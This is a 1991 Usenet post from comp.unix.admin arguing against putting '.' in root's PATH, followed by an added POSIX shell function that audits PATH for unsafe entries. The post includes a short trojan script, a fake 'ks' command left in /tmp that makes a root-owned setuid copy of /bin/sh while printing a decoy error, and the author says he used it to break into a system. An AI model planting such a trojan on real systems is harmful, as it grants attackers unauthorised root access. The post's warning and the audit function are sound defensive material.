Path: utzoo!utgpu!news-server.csri.toronto.edu!bonnie.concordia.ca!thunder.mcrcim.mcgill.edu!snorkelwacker.mit.edu!usc!zaphod.mps.ohio-state.edu!caen!spool.mu.edu!news.nd.edu!mentor.cc.purdue.edu!sage.cc.purdue.edu!asg
From: asg@sage.cc.purdue.edu (The Grand Master)
Newsgroups: comp.unix.admin
Subject: Re: Mysterious security hole
Message-ID: <13780@mentor.cc.purdue.edu>
Date: 19 Jun 91 23:31:26 GMT
References: <91161.131540SCHDAVZ@YaleVM.YCC.Yale.Edu> <70@pyuxf.UUCP> <12714@bsu-cs.bsu.edu> <1991Jun19.150625.17848@chinet.chi.il.us>
Sender: news@mentor.cc.purdue.edu
Reply-To: asg@sage.cc.purdue.edu (The Grand Master)
Organization: Purdue University
Lines: 48

In article <1991Jun19.150625.17848@chinet.chi.il.us> les@chinet.chi.il.us (Leslie Mikesell) writes:
}In article <12714@bsu-cs.bsu.edu> sam@bsu-cs.UUCP (B. Sam Blanchard) writes:
}
}>Here's a nice and fairly simple way to improve security.
}>PATH=/bin:/usr/bin:/etc
}
}Isn't this annoying overkill compared to just putting "." last in your
}path? That will prevent accidental execution of the wrong copy of
}standard commands while still letting you test programs in your current
}directory and run normal makefiles without contortions.
}
}Les Mikesell
}  les@chinet.chi.il.us

I don't know about you, but most of the people I know are not perfect
typists ( ;-) ). It is not uncommon to accidentally type ks instead of ls
(I have seen many people do it before). So now what happens when someone
puts a file ks in /tmp, and you do:

# cd tmp
# ks        (whoops, I meant to type ls)
# ls
......

where the source for ks is something like:

cp /bin/sh .
chown root ./sh
chmod 4777 ./sh
echo ks: not found

hmm. That could lead to problems (in fact I used it to break security in a
system once - and it worked!).

The moral to the story? Unless you are a perfect typist, or you are willing
to read and re-read every line you type BEFORE hitting , better be safe
than sorry.
This message brought to you by CADIP
Citizens Against Dot In PATH

From: Your friendly neighborhood Bruce Varney
---------
Courtesy of Bruce Varney
aka -> The Grand Master
asg@sage.cc.purdue.edu
PUCC
;-)
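Added example, not part of Bruce Varney's post or of the thread: a POSIX sh function that audits a PATH string for the entries this exchange argues about. It goes a little beyond the thread's "." case, since an empty field (a leading, trailing or doubled colon) is searched as the current directory just like ".", a relative entry changes meaning with every cd, and an absolute entry is only as safe as its directory's permissions (a world-writable one such as /tmp lets anyone plant a "ks"). The function name unsafe_path_entries and the tab-separated report format are my own choices, not anything from the post.

```shell
#!/bin/sh
# Added example (not from the original post): audit a PATH string for
# entries that would let a typo such as "ks" for "ls" run a file that
# someone else dropped into a shared directory.
#
# unsafe_path_entries "PATH-STRING"
#   prints one "entry<TAB>reason" line per risky entry on stdout and
#   returns 0 when nothing was flagged, 1 otherwise.
unsafe_path_entries() {
    rest="$1:"      # trailing ":" so the loop also sees the last field
    rc=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # text before the first ":"
        rest=${rest#*:}     # everything after it
        case "$entry" in
            "")
                # "::", a leading ":" or a trailing ":" is an empty field,
                # which the shell searches as the current directory.
                printf '%s\t%s\n' "(empty)" "empty entry, searched as current directory"
                rc=1 ;;
            .|./*)
                printf '%s\t%s\n' "$entry" "current directory is searched"
                rc=1 ;;
            /*)
                # Absolute entry: risky only if anyone can create files there.
                # "$entry/." resolves a symlinked directory before the check,
                # so a lrwxrwxrwx link is not mistaken for a writable directory.
                if [ -d "$entry" ] && \
                   [ -n "$(find "$entry/." -prune -perm -002 -print 2>/dev/null)" ]; then
                    printf '%s\t%s\n' "$entry" "world-writable directory"
                    rc=1
                fi ;;
            *)
                printf '%s\t%s\n' "$entry" "relative entry, meaning changes with cd"
                rc=1 ;;
        esac
    done
    return "$rc"
}

# Stand-alone use: audit the caller's own PATH.
if unsafe_path_entries "$PATH"; then
    echo "PATH looks clean: $PATH"
fi
```

Run it as `sh path_audit.sh` in the shell whose PATH you want to check; anything it prints is an entry you would want to remove or move to the end, and a clean PATH gives exit status 0, which makes the function usable from a login script or a cron job that mails the report.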